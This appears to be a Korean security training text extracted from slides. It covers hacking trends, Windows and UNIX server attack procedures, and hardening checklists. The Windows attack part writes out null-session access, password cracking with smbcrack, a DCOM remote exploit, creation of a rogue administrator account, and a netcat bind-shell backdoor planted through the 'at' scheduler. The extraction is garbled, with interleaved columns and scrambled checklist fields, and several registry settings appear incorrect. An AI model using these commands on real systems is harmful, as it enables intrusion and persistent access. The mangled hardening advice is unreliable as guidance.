< DB1E2BEF7BCADB9F6B0FCB8AEC0DAB1B3C0E72DC3D6C1BEBABB2E687770>

Size: px
Start display at page:

Download "< DB1E2BEF7BCADB9F6B0FCB8AEC0DAB1B3C0E72DC3D6C1BEBABB2E687770>"

Transcription

1 목 차 Part 1. 해킹동향 Part 1. 해킹동향 Part 1 1. 최신인터넷환경 최신인터넷환경 2. 최신해킹동향 Part 2. Windows 서버해킹 대응기술 최근인터넷을이용한산업의발달로인터넷인프라가질적, 양적인팽창을가져오고있으며이에따라서관공서및기업에서개인에이르기까지다양하게중요한정보를인터넷으로전송하여업무에이용하고있다. 이런상황에서관련기관간에정보수집및해킹에대한관심의고조, 그리고해킹기술의발달로인터넷을이용한해킹이급속도로증가하고있는추세에있다. 이런상황에서아래와같은최근해킹의동향을살펴본다. 1. Windows 서버해킹절차 Windows 해킹기술 해킹대응및보안설정 Part 3. UNIX 서버해킹 대응기술 1. UNIX 서버해킹절차 취약점리스트및해킹기법 해킹대응및보안설정 국내인터넷망구축현황(22개대학 14 개연구기관)

2 Part 1 2. 최신해킹동향 나. 대규모 & 분산화경향 가. 지능화 & 자동화경향 최신의해킹기술은 1차적으로동시에다수의서버를공격하고 1차적으로공격당한서버들은다시 2 차적으로다수의다른서버들에게공격을가하는대규모, 분산화경향이뚜렷하게나타나고있다. (EX) Trinoo, TFN, Stacheldraht 등 최신해킹기법은자동화된스캔및공격을수행하는해킹이증가하고있는상황이다. 공격자가 1차적으로몇대의대상 PC를감염시키면 1차대상 PC는자동적으로취약점이있는 PC 를자동적으로스캔하고공격하는경향이확인이나타나고있다. (EX) SQL_Overflow, Win32/Recovery.worm 등 1-2. 인터넷웜의감염경로 1-3. DDoS의공격방식

3 다. 해킹기술의대중화경향 일반적인해킹기술은편리한인터페이스와자동적인해킹을수행할수있는툴로제작되는속도가빨라졌으며, 인터넷을통하여쉽게취득할수있게되었다. 따라서해킹에대한기술을심도있게학습하지않은일반인도쉽게해킹이가능하게되었다. Part 2. Windows 서버해킹 대응기술 바이러스침투가정비인가된자의접근유관기관 트로이목마공공장소, PC 방개인 PC ( 외부망 ) Internet 개인 PC 자료의불법불법열람, 변조삭제, 파괴컴퓨터시스템의시스템의이상동작해킹경유지로경유지로악용될악용될가능성 네트워크 ( 전산망, 인터넷 ) 서버 어플리케이션 데이터베이스 PC 서비스거부공 용량초과공격 비인가자접근 DB 변조, 파손, 비인가자접근격 (DOS) (SYNFlooding) 자료복사, 파유출 바이러스침투 IP 위조 (IP Spoofing) 인터넷웜 논리폭탄 (Logic Bomb) 트로이목마 괴, 변조 트로이목마 사용자의실수 로그삭제 자료의위치변경 회사기밀자료유출 불법장비부착 장비도난 해킹기술사이클 1 단계 : 취약점발견취약점발견은 source code audting, reverse engineering, RFC 문서연구등을통해이루어진다. 일반적으로취약점을발견한 hacker들은바로취약점을공개하지않으며수개월동안이를이용한공격을행한다. 2 단계 : underground 배포어느정도시간이지나면취약점이 underground hacker 들사이에서널리알려지게된다. 3 단계 : 취약점공개, hacking tool 또는 exploit code 공개보통이단계에서보안권고문이제작되고배포된다. script kiddie들의공격이시작되는단계이다. 이단계에서 exploit이나 hacking tool들은단순한것이특징이다 1-4. 해킹피해유형( 출처 : 한국정보시스템감리인협회) 4 단계 : 취약점 scanning tool 보다전문화된 tool 개발보안전문가나 hacker들에의해서취약점 scanning tool가보다수준높은공격 tool들이개발된다. script kiddie 에의한공격이극성을피우는단계이다. 5 단계 : 새로운취약점등장

4 Part 2 1. Windows 서버해킹절차 가. 정보수집단계 (1) 정의 : 공격하고자하는기업과관련된번호, 주소를전화번호목록에서찾는것과동일하다. (2) 수집정보 도메인이름 (Domain Name) 사용중인 IP 주소와범위침입탐지시스템과침입차단시스템( 방화벽) 의유무접근통제리스트(Access Control List) 의유무사용중인네트워크프로토콜사용중인인터넷서비스네트워크또는호스트에적용중인보안정책등이다 Whois를이용하기위해서 접속 (3) 수집방법 : 웹사이트를이용한정보수집해당조직과관련된일반적인정보해당조직의위치와연락처관련회사와부서웹서버관리자의연락처 (4) Whois 를이용한정보수집 Whois 서버는도메인을등록시입력된정보들을유지하고있다. 가장기초적인정보인네트워크관리자연락처, DNS 서버, ISP 업체, IP 할당대역, DNS 1,2차네임서버정보를보고신뢰관계를파악하며침해사고공조수사시이용된다 whois를이용한정보수집

5 (5) Tracert 를이용한네트워크구조파악 공격자의 system에서 target까지의경로에나타나는 system의 IP 및이름을확인하는방법으로다음과같은정보수집한다. - 이용중인 ISP - Packet Filtering Device의유무 - Bandwidth - 사용되고있는장비의종류및벤더, 모델 - 방화벽유무 - Network topology - 반환되는 TTL값을이용하여 IP spoofing 여부조사 - ACL (Access control List) 의존재유무등파악 2-4. Visual Route 를이용한네트워크정보수집( 윈도우 OS에서 Tracert를이용한네트워크구조정보수집 2-5. Sam Spade 를이용한정보수집(

6 나. 스캐닝단계 (1) Netscantools pro 2000 을이용한스캐닝 검색문자 c:/winnt c:/inetpub TSWeb/default.htm 결과 표준 NT/2000 시스템폴더의페이지를보여준다. 표준 NT/2000 인턴넷서비스루트폴더의페이지를보여준다. 브라우저의내장된 ActiveX 컨트롤을통해접근할수있는 Windows 2000 터미널서비스를보여준다. NetScanTools Pro 검색엔진을이용한정보수집 2-7. netscan 툴을이용한스캐닝방법 (2) Superscan 을이용한스캐닝 2-8. Superscan을이용한스캐닝방법

7 (3) NetBrute 를이용한스캐닝 NetBrute Scanner( 는아래와같이 3가지스캐닝가능 -NetBrute : NetBrute 는목표시스템의윈도우파일과프린터공유자원을스캔한다 -PortScan : PortScan은인터넷서비스가가능한목표시스템을스캔한다 -WebBrute : WebBrute는웹서비스사용자의패스워드강약을시험하기위해 HTTP인증서비스로보호되고있는웹페이지를스캔한다 (4) 스캐닝대응방법 BlackICE 를사용하여스캐닝을방지할수있다. - 다운로드 : - 사용법 : BlackICE 설치운영 ZoneAlarm 을사용하여스캔을방지할수있다. - 다운로드 : - 사용법 : NetBrute을이용한스캐닝방법 ZoneAlarm 설치운영

8 다. 목록화단계 (2) Netbios 를이용한목록화 (1) Winfingerprint 를이용한목록화 목록화는적극적으로일반사용자계정, 네트워크공유파일, 그리고사용중인응용프로그램과그버전등에대한정보를얻기위한행동이다. 이러한정보는 anonymous FTP나 Banner Grabbing 등과같은방법으로목표네트워크또는시스템에접근하여수집할수있다.( 윈도우 NT/2000은기본적으로 NetBIOS 프로토콜을사용하고있기때문에몇가지취약점을가지고있다. - 윈도우 NT/2000 에서널세션을허용할경우, 이를이용하여윈도우 NT/2000에승인받지않은사용자가접근할수있다. - 널세션이란사용자가 ID와패스워드를입력하지않고공유대상인 IPC$ (Inter Process Communications, 프로세스간통신) 에연결하는것이다. - 일반적으로 NetBIOS를사용하는시스템에서는 IPC$, C$( 시스템드라이브), Admin$( 기본관리자공유) 은항상공유되어있다. - 원격지에서널세션을이용하여접속하는것이가능하다면, 공격자에게시스템의사용자계정과공유파일, 프린터에대한정보를제공해줄수있다. Null Session 포트 : TCP와 UDP포트 135 ~ 139 번 Winfingerprint를이용한목록화방법

9 Part 2 2. Windows 해킹기술가. 널세션을이용한해킹기술 이포트들은윈도우 NT/2000 표준설치의시작부분에서종종발견되는것이다. 널세션은 TCP 포트 139번에서만만들어지며그위의다른포트들은종종효율성이라불리는코드를위해필요하다. 일례로포트 135는 RPC 종점매핑에사용된다. 이러한것이우리에게말해주고있는것은이러한널세션이나 RPC 같은것은공공네트웍이나심지어특별한경우에보안이관계되어있다면사설네트웍에서도사용되어서는안된다. 이러한접근유형은세션레이어프로토콜인서버메시지블록(Server Message Block) 과 TCP/UDP/IP 처럼단순한것보단더높은레이어기능을제공하는 NETBIOS를필요로합니다. TCP/IP 연결이포트 139로이루어지면세션레이어프로토콜인 SMB와 NETBIOS와 NT 의히든공유인 IPC$ 에접근하기위해사용된다. NT명령어라인에서이것은다음과같이수행된다. (1) 널세션의개요 c: >Net use! & IPC /user: 널세션(Null Session) 접속은윈도우 NT/2000 으로의인증받지않은접속이다. 윈도우 NT/2000 시스템으로의널세션접근을획득한다는것은해커가윈도우 NT/2000 컴퓨터에대한정보를제공받을수있는방법중하나이다. 널세션으로부터해커들은 API를호출할수있고정보를가져가기위해원격프로시져호출을사용합니다. ( 자료출처 : NTFAQ 운영자, 아래와같은정보를제공받을수있다. 패스워드정보그룹정보서비스정보사용자정보활동중인프로세서정보 이러한기술은프로그래미컬하게레드버튼공격이라불리는오래된방법을이용하여쓰여젔다. 이널세션접속을위해서 Tool들이사용될수있으며표준마이크로소프트 API들이호출된다. 예를들어 WIN32 함수중 LookupAccountName 와 LookupAccountSid 는 SID나 RID를계정이름으로계정이름을 SID나 RID 로바꾸는역할을한다. 이러한함수의예는 user2sid라는프로그램을사용하여확인해볼수있는데이프로그램은 Evgenii Borisovich Rudnyi 이만든것이다. (2) 널세션을이용한익명연결 1 단계 : 자신의컴퓨터에공유되어있는자원확인 : net share 명령 널세션접근은또한특권을확대할때에도그리고 DoS 공격을수행할때도사용될수있다. 아래 TCP/UDP포트테이블을보시고 NT/W2000 에서그들의용도를살펴보자. 키워드십진수설명 loc-srv 135/tcp Location Service (RPC endpoint mapping) loc-srv 135/udp Location Service (RPC endpoint mapping) netbios-ns 137/tcp NETBIOS Name Service netbios-ns 137/udp NETBIOS Name Service netbios-dgm 138/tcp NETBIOS Datagram Service netbios-dgm 138/u에 NETBIOS Datagram Service netbios-ssn 139/tcp NETBIOS Session Service netbios-ssn 139/udp NETBIOS Session Service net share 명령어실행결과

10 1. Admin$ : 컴퓨터를원격관리하는동안시스템에서사용하는공유자원이다. 이공유자원의경로는항상윈도우 2000 시스템폴더( 윈도우 2000 이설치된폴더, 예를들어 C: Winnt) 의경로 2. IPC$ : 프로그램간통신에필요한 named pipe 를공유하는자원이다. 이자원은컴퓨터를원격관리하는동안그리고컴퓨터의공유자원을볼때사용된다. 3. [ 드라이브문자]$ : 관리자가저장장치( 하드디스크등) 의드라이브에접근할수있도록해주는공유자원이다. A$, B$, C$, D$ 등으로표시된다. 예를들어 C$ 는 C 드라이브의공유이름이며, 이자원을사용하여관리자는네트워크를통해 D 드라이브에액세스할수있다. 4. Print$ : 프린터를원격관리하는동안사용하는자원이다 net use 명령어로익명연결의확인 2 단계 : 공격이가능한지확인. 이명령어가잘실행되면널세션을이용하여시스템접근가능. c: >net use IP 주소 IPC$ * /u: [ 참고] 윈도우 NT/2000이설치되어있는시스템을찾는방법 - IP Network Browser( 다운로드 : 을이용하여 SNMP을이용하여운영체제스캔 널세션공격기법의가능여부판별 IP network Browser를이용한윈도우 OS 찾기

11 3 단계 : 사용자계정과공유자원에대한자세한정보를취득 Dumpsec을이용하기위해서는 IPC$ 공유자원에익명연결이되어있어야한다. 사용자계정과공유자원에대한자세한정보를제공할수있는좋은도구이다. Dumpsec을이용하기위해서는 IPC$ 공유자원에익명연결이되어있어야한다.( 5 단계 : 원격으로공격대상의 C 디렉토리접근, 로그인과정없이 C 디렉토리접근가능 공격대상의 C 디렉토리접근 시스템의공유자원확인 * 널섹션을이용한해킹방지 4 단계 : net use IP 주소 공유자원$ 명령실행하여원격로그인 c: >net use 211.xx.xxx.xxx c$ 1. 일반적으로관리폴더라고해서숨은공유폴더들이제공되고있으며, 관리목적상사용됨( ADMIN$, IPC$, C$,D$ ). 아래와같은레지스트리정보에서변경작업이가능 HKEY_LOCAL_MACHINE System CurrentControlSet Services LanmanServer Param eters - Value name : AutoShareServer ( 서버일경우) - Value name : AutoShareWks ( 프로일경우) - Data Type : DWORD -Value:0(zero) 위값을새롭게생성한후에재부팅전에커맨드에서먼저제거후재부팅 C: > net share d$ /delete ( D$ 을제거시방법) 원격로그인시도-성공 * 암호물어보면암호입력.( 암호크래킹은뒷장참조) 2. 포트차단 - 137~139 port 닫기 port 닫기( HKLM SYSTEM CurrentControlSet Control LsaRegistry Key 편집) - IPC$ 공유해제

12 나. 패스워드크래킹 (2) 패스워드크래킹도구 - ANTExp ANTExp( -상용, 평가판제공( 기간제한및기능제한) 윈도우 NT/2000 시스템에서사용자계정에대한정보를저장하고있는파일은보안계정관리자(SAM, Security Account Manager) 로 SAM 은사용자이름(ID) 과해쉬(Hash) 알고리즘을이용하여암호화된패스워드를저장. SAM은윈도우 NT/2000 의 winnt system32 config 에저장. 윈도우 NT/2000이실행중일경우에는 SAM 파일을복사하거나이동할수없으며물론읽기도불가능. SAM 파일은매우중요하기때문에( 시스템을사용할사용자계정에대한정보를보유하고있기때문에) 만일을위하여복사본이존재. SAM 파일의복사본은윈도우 NT/2000 루트폴더의하위폴더인 Repair 폴더( winnt repair) 에있다. (1) 패스워드크래킹의종류 ANTExp를이용한공격에서시스템선택 - 사전공격 (Dictionary Attack) : 사전에나오는단어들대부분을가지고있는파일을구성한후, 이파일에있는단어들을사용해서사용자의패스워드를추측하는방법(1만개단어사용한시스템의사용되고있는패스워드중 70% 크랙) 패스워드생성이나변경에사용할문자의종류 - 무작위대입공격 (Brote Force Attack) : 문자 a 부터시작해서 aa, ab, ac 등을시도한다. 만약시스템의패스워드길이가 6자리이하로지정하면 aaaaaa 부터시작. 이공격은시간이많이걸린다. - 혼합공격 (Hybrid Attack) : 일반패스워드는사전에나오는단어뒤에숫자를붙이는형태의패스워드가많다.(ex. Pretty1004) 이러한경우에사전에있는단어뒤에문자나숫자를더연결해서공격하는방법즉, 사전공격과무작위대입공격을합쳐놓은것 ANTExp를이용한공격에서패스워드조합문자선택 (3) 패스워드크래킹도구 - LC

13 LC4 를이용한패스워드크랙( 다. Dcom 취약점을이용한해킹기술 최근에 Blaster Worm은 DCOM 의취약점을이용하였다. windows 2000은기본적으로 DCOM 이활성화되어있으며, service pack 4를설치해도 hotfix를설치하지않는다면취약하다. Kaht.exe는이러한취약점을공격하기위한 remote exploit 이다. exploit 가성공한다면 command shell 을얻을수있다. command shell 을얻었다면사용자계정추가, 패스워드변경이가능하다. c: > kaht.exe 시작주소 끝주소 LC4의패스워드크랙화면 (4) 패스워드크래킹도구 - SMB password crack SMB 패스워드크랙공격은패스워드대입을통해서패스워드를찾아낸다. smbcrack.exe 는 windows 2000 의공유폴더에대한패스워드를찾아내기위해서사전식대입공격을이용한다. windows 2000은디폴트공유가설정되어있으므로공격하기위한취약점이없을경우시도하는방법이다. c: > net use IPC$ * /u:administrator * smbcrack.exe ( 주의 : password file을 1라인에 1 개씩작성) Kaht를이용한해킹 SMB password crack를이용한패스워드크랙화면 [ 참고 ] net명령 nbtstat -N nbtstat -A IP net session net session ip /delete net user someone * /add net localgroup administrators someone /add net user administrator

14 라. 백도어설치 *Kaht공격방지기술 시작 -> 실행 -> dcomcnfg.exe 해제 패스워드없이로그인하기위해서백도어를설치한다. 백도어를시스템에설치하기위해서는먼저공격시스템에백도어프로그램을설치해야하는데만약디폴트공유가해제되어있다면스케쥴서비스를실행시킨뒤스케쥴에등록하여공유디렉토리를설정한다. 이후에백도어를공유디렉토리에복사하고스케쥴에등록한다. 공격자가원격지에서 nc, telnet를이용해서접속하면 command shell 을얻는다. ftp://ftp.microsoft.com/reskit/win2000/sc.zip c: > net use * /u:administrator c: > sc query c: > sclist c: > netsvc schedule /start c: > net time c: > at :00A ""c: nc.exe -l -p e c: winnt system32 cmd.exe"" nc c: > at :00A ""C: winnt system32 net share C=C: "" c: > copy netspy.exe C c: > at... * 백도어탐지 백도어정보를확인하기위해서 netstat 프로그램을이용해서의심가는포트를찾아내고, fport 를이용해서백도어프로그램을중단시킬수있다. ( ontent=/resources/proddesc/fport.htm)

15 Part 2 3. 해킹대응및보안설정 ID 패스워드도용공격자 Virus & Warm Trojan Horse 인터넷 Week Management 정보유출 / 파괴 불법접근제어등 본서에서는해킹대응및보안설정부분에대해서체크리스트를제공하며이를기반으로체계적인해킹대응및보안설정을수행할수있도록한다. 가. 계정체크리스트 사용자 Week Encryption 데이터가로채기 Cyber 거래서버 내부사용자 데이터훔쳐보기 서버취약점 어플리케이션취약점 사용자흉내내기공격등 패치미적용 사용자인증의취약점 보안 Hole CGI 등 Appl. 취약점 부적절한서버관리 공격자 공격자 1. Default Administrator 계정변경디폴트계정을바꾸지않을경우해커들은계정이름과패스워드를쉽게위험추측할수있다 권장 Default로존재하는 Administrator 계정에대해이름을바꾸거나사용하지못하도록잠그는것이필요하다 2. Default Guest 계정을제거및 ' 사용안함' 으로설정 위 험 Default Guest를변경하지않을경우 Guest계정으로어떤파일이나디렉터리또는레지스터리키를쓰거나지울수있다 권 장 Default로존재하는 Guest 계정에대해이름을바꾸거나사용못하도록잠그는것이필요하다 인터넷서비스의위협요소( 출처 : 한국정보시스템감리인협회) 나. 패스워드체크리스트 1. 취약한패스워드의 Aging 적용 위험패스워드정책이설정되지않을경우, 취약한패스워드가존재할수있다 권 장적절한계정정책의사용을통하여취약한패스워드의사용을제한해야한다 2. Password Cache는 Disable 시킨다 위 험 로그온기록을남김으로써정보가노출될수있다 권 장 로그온기록이안남도록레지스트리에서제거해야한다 설 정 Hive : HKEY_LOCAL_MACHINES Key : SOFTWARE Microsoft Windows NT CurrentVersion Winlogon NAME : CachedLogonsCount TYPE : REG_SZ VALUE : 0으로설정

16 다. 로그온정책체크리스트 라. 파일시스템체크리스트 1. 인증이실패하여다시시도하는최대횟수를지정 위험비인가자들이로그온을계속시도될수있다. 권 설 장인증시도횟수를지정해야한다 정 Hive : HKEY_LOCAL_MACHINES Key :SYSTEM CurrentControlSet Services RemoteAccess Parameter NAME : AuthenticateRetries TYPE : REG_SZ VALUE : 0~10 내의범위로설정 2. 인증을위한최대제한시간을설정 위험비인가자들에게로그온접근이노출될수있다 권장인증을위한최대제한시간을설정해야한다 설 정 Hive : HKEY_LOCAL_MACHINES Key:SYSTEM CurrentControlSet Services RemoteAccess Parameter NAME : AuthenticateTime TYPE : REG_SZ VALUE : 20~600 내의범위로설정 3. Admin으로자동로그ON 되지않도록설정 위험자동으로 Admin 권한으로로그인되었을때정보가누출될수있다 1. 파일시스템은 NTFS를사용한다 위험 권 장 파일시스템을 NTFS 로설정하지않을경우허가되지않은사용자의접근을제한할수없다 파일과디렉터리별로사용자접근권한과보안감사를설정하기위해 NTFS 파일시스템으로설정하여야한다 2. 불필요한공유디렉토리가존재하지않도록한다 위험 권장 설 정 공유된디렉터리는외부공격시목표가될수있으므로, 필요하지않을경우공유를해지해야한다 공유디렉터리에적절한접근권한의설정이필요하며, 만약공유시사용자가지정되어있어야한다 registry 편집 (regedit) Hive : HKEY_LOCAL_MACHINE Key : System CurrentControlSet Services LanmanServer Parameters Name : AutoShareServer Type : REG_DWORDVALUE : 0으로설정 3. Shutdown할때Page File을지운다 위험기존환경에대한기록이노출될수있다. 권장레지스트리설정을통하여 Page File 을지우도록설정해야한다. 권장 Admin 권한으로자동로그 ON이안되도록해야한다 설 정 Hive : HKEY_LOCAL_MACHINES Key :SYSTEM System CurrentConsoleSet Services RemoteAccess Paramet ers NAME : Autoadminlogon TYPE : REG_SZ VALUE : 0으로설정 설 정 registry 편집 (regedit) Hive : HKEY_LOCAL_MACHINE Key:System CurrentControlSet Control Session Manage Memory Management Name : ClearPageFileAtShutdown Type : REG_DWORD Value : 1으로설정

17 마. 접근통제체크리스트 바. 서비스최적화체크리스트 1. 원격에서로그인한사용자가시스템을 shutdown할수없도록한다 1. 외부로부터의 NetBIOS를이용한불필요한접근을제한 위험 원격에서시스템을셧다운할수있는권한을제한함으로써시스템피해를방지할수있다 위 험 NetBIOS 가실행중일경우네트워크내에있는도메인및로그온사용자, 작동중인서비스들의정보가유출될위험이있다 권장원격에서허가된사용자만이시스템을 shutdown 할수있어야한다. 설 정 registry 편집 (regedit) Hive : HKEY_LOCAL_MACHINE Key : System CurrentControlSet Services LanmanServer Parameters Name : AutoShareServer Type : REG_DWORD normal : 0, refues reset=1으로설정 권장 파일서버, 도메인컨트롤서버인경우를제외하고는, 외부로부터의 NetBIOS 를이용한접근을허용하지않아야한다 2. 적절하지않은서비스는중지한다 위험 불필요한서비스를 open 함으로써원격시스템에서공격을할수있는기회를제공 2. 원격에서 Anonymous의레지스트리접근을차단익명의사용자가레지스트리의값을수정하는것을제한함으로써시스템이위험손상되는것을방지할수있다 권장 시스템이수행하는역할에맞는적절한서비스가수행되고있는지주기적인확인필요 권장레지스트리 winreg값과 remote registry service 확인해야한다 설정서비스에서remote registry service 중지 3. Anonymous( 익명의) Network Access를통한정보수집제한 위 권 설 정 험 장 Null session 을통해가능한정보의유출, 사용자계정과공유리스트를노출할수있다. NetBIOS의 Null Session을이용한 Network 접근을통하여 System의정보를수집하는것을제한한다. registry 편집 (regedit) Hive : HKEY_LOCAL_MACHINE Key : SYSTEM CurrentControlSet Control LSA Name : RestrictAnonymous Type : REG_DWORD value: 1으로설정 4. 일정시간동안시스템을사용하지않을경우, 시스템을 Lock할수있는화면보호기설정 위험 권장 관리자가작업도중부재시화면보호기를설정하고 Lock 을설정함으로써악의를품은다른사용자가시스템에접근하는것이불가능하게한다 물리적접근의제한과함께일정시간동안시스템을사용하지않을경우 Console 상으로의접근을허용하지않도록화면보호기에암호를설정한다 설 정 불필요한서비스 Alerter, ClIPBook Server, Computer Browser, DHCP Client Directory Replicator ( 로그온스크립트복제기능이필요없는경우) Messenger, NetLogon ( 단, 클라아언트의로그온이필요없는경우) Network DDE, Network DDE DSDM, Plug and Play Remote Procedure Call (RPC) Locator, SNMP Trap Service Spooler ( 프린터를사용하지않을경우), Service Workstation (Required for Raptor Firewall TCP/IP NetBIOS Helper, Telephony Service 3. SNMP 서비스의 Community String이 Default(Public, Private) 로설정되어있지않도록한다 위험 기본적으로설정된 public, private community string을이용해서내부시스템에불법적인접근이가능하다 권장불필요한서비스는중지시켜야한다 설정 불필요하다면 SNMP Service 중지, 필요하다면등록정보 보안탭에서커뮤 니티를 Default 가아닌영자, 숫자, 특수기호포함된스트링으로구성

18 사. 로그관리체크리스트 아. IIS 체크리스트 1. General/System Auditing 을수행하라 위험 권장 설 정 사용자관리자의정책메뉴에서해당되는감사부분을설정해야시스템의이상징후시추적이가능하다 시스템의이상징후발견및사후조치를위하여 General/System Auditing을수행 Hive : HKEY_LOCAL_MACHINES Key : SYSTEM CurrentControlSet Control Lsa NAME : Crashonauditfail TYPE : REG_DWORD VALUE : 1 2. 이벤트감사를사용하여, 시스템의비정상적인활동모니터링 위험 권장 이벤트감사를사용하여얼마나자주비인가자가시스템에들어오는지탐지하는데도움 로그인 파일접근실패등을선택하여 일정기간동안로그보관을통하여장 기관리 3. Anonymous( 익명의) 에의한 Event View 기능제한 위 권 설 정 험 장 4. IIS 로그관리 Event Log의View기능을제한함으로써해커로부터시스템에설정해놓은이벤트설정사항이노출되는것을방지할수있다. Anonymous( 익명) 에의한 Event log의 view 기능을제한하지않을경우는모든사용자에의해서 event log의조회가가능하므로이에대한설정을레지스트리에서해준다 Hive: HKEY_LOCAL_MACHINE Key: System CurrentControlSet Services EventLog [LogName] Value Name: RestrictGuestAccess, Data Type : REG_DWORD Value Data: 위험로그가없다면보안침해사고발생여부를확인할수없다 권장로그인, 접속 IP, 파일접근실패등을선택하여, 일정기간동안로그보관 설 정 제어판 관리도구 인터넷서비스관리자 가동웹서비스등록정보 로깅 에서설정가능 1. msadcs.dll 이존재여부 위험 msadcs.dll 파일이버퍼오버플로우의공격으로사용될위험이있다 권장 msadcs.dll 파일을삭제하는것이좋다 2. RDS(Remote Data Service) 취약점제거 위 험 RDS를통해서비스거부공격이나원격에서관리자권한으로임의의명령수행할수있다 권장 RDS 와관련된파일은제거해야한다. 설 정 1) 레지스트리키를삭제( 아래참조) 2) msadc.dll를삭제한다 3)C: ProgramFiles Common Files System Msadc 아래서브디렉토리와파일들을모두삭제한다. Hive: HKEY_LOCAL_MACHINE Key:System CurrentControlSet Control Service W3SVC Parameters ADCLaunch RDSServer.DataFactor y Hive: HKEY_LOCAL_MACHINE Key:System CurrentControlSet Control Service W3SVC Parameters ADCLaunch AdvancedDataFactory Hive: HKEY_LOCAL_MACHINE Key:System CurrentControlSet Control Service W3SVC Parameters ADCLaunch VbBusObj.VbBusObjCls 3. 디폴트설치되는샘플파일/ 디렉터리를제거한다 위 험 비권한자또는익명의사용자가웹서버설치시default로존재하는샘플파일및디렉터리에모든권한을제공하기때문에심각한보안위험사태가존재할가능성이있다 권장샘플/ 디렉터리를제거해야한다

19 자. FTP 체크리스트 1. FTP 디폴트계정및익명접속관리를차단계정의재명명을하지않을경우해커들은계정이름과패스워드를쉽게추위험측할수있으며, 익명접속하여쉽게침투할수도있다 Part 3. UNIX 서버해킹 대응기술 권 장 Default로존재하는 ftp 계정에대해이름을바꾸거나사용하지못하도록잠그는것이필요하며, Anonymous Ftp 서비스는중지시켜놓아야한다 설 정 제어판 관리도구 인터넷서비스관리자 가동FTP 서비스등록정보 FTP익명접속체크박스해제 에서설정가능 일반적인보안구성도 2. FTP의홈디렉토리가 Default가아닌다른디렉토리로적용 위 험 Default 홈디렉토리를바꾸지않을경우해커들은홈디렉토리를쉽게추측할수있다 권장홈디렉토리를다른디렉토리로적용되어야한다. 설 정 제어판 관리도구 인터넷서비스관리자 가동FTP서비스등록정보 Default Home Directory 변경 에서설정가능 차. Patch 체크리스트 라우터: 동일한전송프로토콜을사용하는분리된네트워크를연결하는장치로서네트워크계층간을서로연결하는장치 1. MS SQL Worm 감염여부확인 위험 감염되면다른서버로자동화된악의성코드에의한접속을시도할위험이있다 권장웜바이러스에노출이안되도록최신버전과패치를유지한다 2. 최신의서비스팩과 Hot fix 설치 위험 시스템의상황을이해하여최근에나온서비스팩및보안패치를적용하여시스템에발생될위험을감소시킨다 권장 Microsoft사에서제공되는최신의서비스팩및 Hot fix를설치하여야한다 방화벽 : 두네트워크사이의트래픽을제어하기위해특별히구성된시스템으로서패킷필터에서부터, 다중필터, 전용프락시서버, 로깅컴퓨터, 스위치, 허브, 라우터및전용서버등을말함. N-IDS : 침입탐지시스템으로서 NIDS, HIDS, LIDS 세종류가있음 - NIDS: 네트워크를통해일어나는침입을탐지하는 10/100 Mbps의이더넷 (Ethernet) 용네트워크기반침입탐지시스템. 라우터나게이트웨이 (gateway) 뒤에설치하여운영되며프로미스큐어스(promiscuous) 모드로동작, 지나가는모든패킷을검사하도록되어중소규모의네트워크환경에적합하다

20 - HIDS: 시스템내부에서일어나는침입을탐지하는호스트기반침입탐지시스템각각의 UNIX 시스템에설치하여운영되므로복잡한스위칭네트워크환경에적합. -LIDS: 리눅스커널을통해침입자에대해보호, 탐지, 응답의세가지기능을제공함. Part 3 1. UNIX 서버해킹절차 해커의침입영역 가. 정보수집 해커는공격대상에대한각종정보및취약점을수집하여해킹에이용하려는조사단계를거친다. 정찰단계에서얻어낸 target 시스템에대한정보(OS 종류, 현재제공되어지고있는서비스종류, 열린포트) 등을이용하여취약점을찾아냄 - 대상결정 ( 도메인또는단일호스트) - 대상네트워크또는시스템의정보수집호스트명(Host name) 파악 IP 주소(IP address) 파악호스트기종파악운영체제종류및버전파악 Network 구성및형태파악신뢰관계에있는호스트파악사용자이름및 ID, Password 파악 - 대상사이트에대한기본정보수집다음사이트로이동 ( 회사명을입력 - 네트워크공격이가능하다. - 서버에대한공격이가능하다. - 내부망에대한네트워크서비스, 운영체계, 응용프로토콜, 응용프로그램에대한공격이 가능하다. - 해커의침입이후에는신뢰관계를맺은서버로의공격확대 3-1. Internic.net에접속하여정보수집

21 [ 참고] Internic 월드와이드웹(WWW) 을위한.com.net 및.org 등 최상위도메인이름의등록및유지관 리책임을맡고있던조직. 실제등록업무는 " 네트웍솔루션사(Network Solutions, Inc.)" 에 의해수행. 1998년 10 월에발표된미국정부의새로운정책에따라, 최상위계층도메인이 름의등록에경쟁원리가도입되고, 등록인가절차를운영하기위한새로운비영리통합기구 로 ICANN이지정. ICANN은초기에기존의네트웍솔루션사외에도다섯개의새로운등록 회사들을지정하였으며, 2 개월간의시험기간을두었음. 이시험기간이후에등록기관의 추가지정이기대. 나. 스캐닝 Bigwidget 라는웹사이트를공격목표로삼음 3-2. bigwidget.com에대해서서비스확인 hacker: ~$ telnet bigwidget.com 25 ==> 이해커는 sendmail 서비스가사용하는 25 번포트를통해서서버에접속을시도한다. Connected to bigwidget.com ==> 몇분후에마치성공적으로접속된것처럼보인다. Connection closed by foreign host. ==> 그러다가갑자기접속이끊어진다. 이상황을보고대상서버에현재방화벽이연결되어있다는사실을알수있다. hacker: ~$ telnet bigwidget.com 143 ==> 방화벽은네트워크보안을위한최선의방비책이되지못하다는점을해커는알고있다. 해커는그서버의다른포트를탐색하고우연히 IMAP 포트(143) 가열려있는것을발견하게된다. 그리고대상서버의보안결함도발견된다

22 다. 수집정보에대한해킹기술정보수집 해커는루트쉘사이트에서에서 IMAP 포트를이용한악성코드를찾는다인터넷에수많은해킹전문사이트가존재한다이사이트들은 Os 종류에따른많은취약점과해킹방법정보를제공하고있다. Ex) bigwidget.com에대해서오픈포트확인 3-4. 해킹사이트를이용한해킹방법취득 IMAP: "Internet Message Access Protocol" 의약자로서로컬서버로부터 을읽기위한표준프로토콜로서버전은 IMAP4 까지나와있다. IMAP 서버의버퍼오버플로우취약점을이용한해킹프로그램이인터넷상에널리퍼져있으므로이프로그램의사용에주의가필요하다. 현재사용가능한 exploit( 공격코드) 를이용한다

